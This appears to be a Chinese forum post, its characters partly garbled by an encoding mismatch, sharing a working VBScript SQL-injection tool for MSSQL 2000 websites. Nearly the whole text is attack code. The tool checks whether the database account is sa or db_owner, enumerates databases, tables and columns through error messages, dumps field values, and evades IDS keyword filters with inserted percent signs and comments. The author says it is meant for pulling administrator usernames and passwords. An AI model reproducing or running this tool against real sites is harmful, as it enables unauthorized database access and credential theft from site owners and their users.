是有這個(gè)問題的。
第一���,應(yīng)當(dāng)用正則判斷較好。
第二,我用循環(huán)加返回結(jié)果大于30個(gè)長度就退出循環(huán)���,我相信沒有表名和字段名大于30個(gè)字母的��,但是字段值有可能大于,這個(gè)地方解決的不夠好。但是一般是用來查后臺的管理員的用戶名和密碼����,所以就放棄了���。
復(fù)制代碼 代碼如下:
set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then
Wscript.Quit
End If
if arg.count=0 then
usage()
Wscript.Quit
End If
Sub usage()
wsh.echo string(79,"*")
wsh.echo "暫且只支持mssql顯錯(cuò)模式���,直接寫url為數(shù)字型��,寫url'為字符型,url里有&請用雙引號包含url"
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
wsh.echo "以下兩個(gè)腳本可互相參考"
wsh.echo "http://www.companysz.com/article/14172.htm"
wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到當(dāng)前權(quán)限"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部庫名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname"
wsh.echo "cscript "&wscript.scriptname&" url table 庫名||-------->得到所給庫的全部表名"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table
master"
wsh.echo "cscript "&wscript.scriptname&" url filed 庫名 表名 ||---------->得到所給庫所給表的全部字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 filed master spt_server_info"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 庫名 表名||--->得所給庫、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 result id master sysinfo"
wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根據(jù)關(guān)鍵字查找字段"&vbcrlf&"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search
pass"
wsh.echo string(79,"*")&vbcrlf
end Sub
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function UrlEncode(str)
str = Replace(str," ","%20")
UrlEncode = str
End Function
Function GetBody(url)' xml得到網(wǎng)頁源碼,可以改成cookie或get提交
On Error Resume Next
Aurl=Split(url,"?") '這是為post提交的
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "post", Aurl(0), False, "", ""
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.setRequestHeader "Accept-Encoding", "gzip, deflate"
.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR
3.0.04506; .NET CLR 1.1.4322)"
.setRequestHeader "Connection", "Keep-Alive"
.setRequestHeader "Cache-Control", "no-cache"
.Send UrlEncode(Aurl(1)) 'post提交
GetBody = .ResponseBody
.abort
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadTExt
objstream.Close
Set objstream = Nothing
End Function
Function ReplaceKeyWord(Value)'繞過ids過慮
Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown-
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|
[k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]
|sp_->s%p_|[k]|and->a%nd"
Dim i, Relpacement, Temp
Relpacement = Split(Table, "|[k]|")
ReplaceKeyWord = Value
For i = 0 to UBound(Relpacement)
Temp = Split(Relpacement(i), "->")
If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1))
NExt
End Function
Function result(sHTMLTEMP) '用varchar做關(guān)鍵字分隔網(wǎng)頁內(nèi)容�����,用正則帥一點(diǎn)����,可惜不太會(huì)
aHTML = Split(sHTMLTEMP, "varchar")
If(UBound(aHTML) > 0)Then
sHTMLTEMP = aHTML(1)
aHTML = Split(sHTMLTEMP, "'")
sHTMLTEMP = aHTML(1)
End If
result=sHTMLTEMP
End Function
Function Str2HEx(strHEx)'sql的16進(jìn)制轉(zhuǎn)換函數(shù)
Dim sHEx
For i = 1 To Len(strHEx)
sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1)))&"00"
NExt
Str2HEx = "0x"&sHEx
End Function
Function Str2HExtwo(strHEx)'sql的16進(jìn)制轉(zhuǎn)換函數(shù)
Dim sHEx
For i = 1 To Len(strHEx)
sHEx = sHEx & HEx(Asc(Mid(strHEx,i,1)))
NExt
Str2HExtwo = "0x"&sHEx
End Function
Function MoveR(Rstr) '去重復(fù)
Dim i,SpStr
SpStr = Split(Rstr,",")
For i = 0 To Ubound(Spstr)
If I = 0 then
MoveR = MoveR & SpStr(i) & ","
Else
If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then
MoveR = MoveR & SpStr(i)
Elseif instr(MoveR,SpStr(i))=0 Then
MoveR = MoveR & SpStr(i) & ","
End If
End If
NExt
End Function
function page(sql)
page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"")
End Function
url=arg(0)
injection =arg(1)
'--------------------------------------以下代碼是注入語句,完全不需要引號
select case arg(1)
Case "limit"
body=Replace(getHTTPPage(url),Chr(34),"")
'語句單獨(dú)提出來��,方便以后修改�,第一條是sa,第二條是DB_owner
sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--"
sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--"
Bodyone=page(sqlone)
bodytwo=page(sqltwo)
wsh.echo "當(dāng)前信息:"
If Len(body)=Len(Bodyone) Then wsh.echo "SA"
If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then
wsh.echo "DB_owner"
Else
wsh.echo "PUBLIC"
End If
sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
rtemp=Split(sqlthtree,"|")
servername=result(page(rtemp(0)))
version=result(page(rtemp(1)))
user=result(page(rtemp(2)))
db_name=result(page(rtemp(3)))
wsh.echo "servername:"&servername
wsh.echo "version:"&version
wsh.echo "user:"& user
wsh.echo "db_name:"& db_name
case "dbname"
i=1
Do
sql="and db_name("&i&")>0--" '暴庫名語句
Body = page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
case "table"
i=1
Do
' 表名語句 agr(2)表示庫
sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects
where xtype=0x7500))--"
Body = page(sql)
k=InstrRev(body,"varchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
case "filed"
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0--
"
biaoid=result(page(sqlbiaoid))
biaoid=Replace(biaoid,Chr(124),"")
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- "
k=Replace(result(page(sqlclounmcnt)),Chr(94),"")
wsh.echo "共有列名"&k&"個(gè)"
For i=1 To k
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere
id="&biaoid&" order by colid) t order by colid desc)=0--"
wsh.echo result(page(sqlfiled))
nExt
case "result"
i=1
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的總數(shù)目語句
k=result(page(sqlcloum))
k=Replace(k,Chr(94),"")
wsh.echo arg(2)&"字段共有記錄數(shù)"&k&"個(gè)"&vbcrlf
For i=1 To k
sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4)
&"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--"
Body = page(sqlneirong)
wscript.echo Replace(result(body),Chr(94),"")
Next
Case "search"
love=Str2HExtwo(arg(2))
wscript.echo "請稍候��,正在查循,暫且只列10條�����,結(jié)果顯示為'表名|字段名'格式"
TimeSpend = Timer
For i=1 To 10 '可以根據(jù)需要改動(dòng)這個(gè)10
sqlsearch="And (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"&i&"/* */object_name(id)/* */as/* */t_name,name/*
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindEx(cast("&love&"/* */as/* */varchar(2000)),name)%3E0/* */and/* */left(name,1)!=0x40/* */order/*
*/by/* */t_name/* */asc)/* */as/* */T/* */order/* */by/* */t_name/* */desc)>0--"
Body = page(sqlsearch)
body=result(body)
a=a&body&","
NExt
TimeSpend = round(Timer - TimeSpend,2)
wsh.echo MoveR(a)
wsh.echo "用時(shí):" & TimeSpend & "秒."
Case Else
If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then
wscript.echo "注意參數(shù)"
usage()
End if
end select
